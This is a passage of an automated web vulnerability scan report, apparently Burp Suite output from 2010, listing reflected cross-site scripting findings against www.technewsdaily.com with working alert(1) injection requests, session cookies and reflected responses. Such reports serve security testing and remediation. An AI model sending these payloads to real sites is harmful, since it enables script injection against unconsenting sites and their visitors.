The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd8b'-alert(1)-'6487342d04e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy-policy8bd8b'-alert(1)-'6487342d04e/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/privacy-policy8bd8b'-alert(1)-'6487342d04e/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.140. http://www.technewsdaily.com/privacy-policy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /privacy-policy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff3c'-alert(1)-'e6b95dfdb2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy-policy/?6ff3c'-alert(1)-'e6b95dfdb2c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46965

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/privacy-policy/?6ff3c'-alert(1)-'e6b95dfdb2c=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.141. http://www.technewsdaily.com/reviews/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /reviews/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5bc'-alert(1)-'15f7bb1e4d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviewsff5bc'-alert(1)-'15f7bb1e4d6/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/reviewsff5bc'-alert(1)-'15f7bb1e4d6/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.142. http://www.technewsdaily.com/reviews/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /reviews/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842c5'-alert(1)-'3342d51a6d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/?842c5'-alert(1)-'3342d51a6d4=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 160386

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/reviews/?842c5'-alert(1)-'3342d51a6d4=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.143. http://www.technewsdaily.com/section/cool-gadgets [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/cool-gadgets

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cbac'-alert(1)-'820338cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section1cbac'-alert(1)-'820338cdb/cool-gadgets HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section1cbac'-alert(1)-'820338cdb/cool-gadgets",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.144. http://www.technewsdaily.com/section/cool-gadgets [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/cool-gadgets

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 833d5'-alert(1)-'a846275ffde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/cool-gadgets?833d5'-alert(1)-'a846275ffde=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/cool-gadgets?833d5'-alert(1)-'a846275ffde=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.145. http://www.technewsdaily.com/section/cool-gadgets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/cool-gadgets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84e0e'-alert(1)-'f803134282c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section84e0e'-alert(1)-'f803134282c/cool-gadgets/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section84e0e'-alert(1)-'f803134282c/cool-gadgets/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.146. http://www.technewsdaily.com/section/cool-gadgets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/cool-gadgets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5ac8'-alert(1)-'4bb59163af7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/cool-gadgets/?c5ac8'-alert(1)-'4bb59163af7=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45704

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/cool-gadgets/?c5ac8'-alert(1)-'4bb59163af7=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.147. http://www.technewsdaily.com/section/future-tech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/future-tech

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95228'-alert(1)-'f2fafe09060 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section95228'-alert(1)-'f2fafe09060/future-tech HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section95228'-alert(1)-'f2fafe09060/future-tech",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.148. http://www.technewsdaily.com/section/future-tech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/future-tech

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29de3'-alert(1)-'0ac924447e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/future-tech?29de3'-alert(1)-'0ac924447e7=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/future-tech?29de3'-alert(1)-'0ac924447e7=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.149. http://www.technewsdaily.com/section/future-tech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/future-tech/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177c7'-alert(1)-'e9b5495fba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section177c7'-alert(1)-'e9b5495fba8/future-tech/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section177c7'-alert(1)-'e9b5495fba8/future-tech/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.150. http://www.technewsdaily.com/section/future-tech/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/future-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4109c'-alert(1)-'b3c666cfc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/future-tech/?4109c'-alert(1)-'b3c666cfc65=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44677

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/future-tech/?4109c'-alert(1)-'b3c666cfc65=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.151. http://www.technewsdaily.com/section/how-to [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/how-to

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e223b'-alert(1)-'cf82c55609a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectione223b'-alert(1)-'cf82c55609a/how-to HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
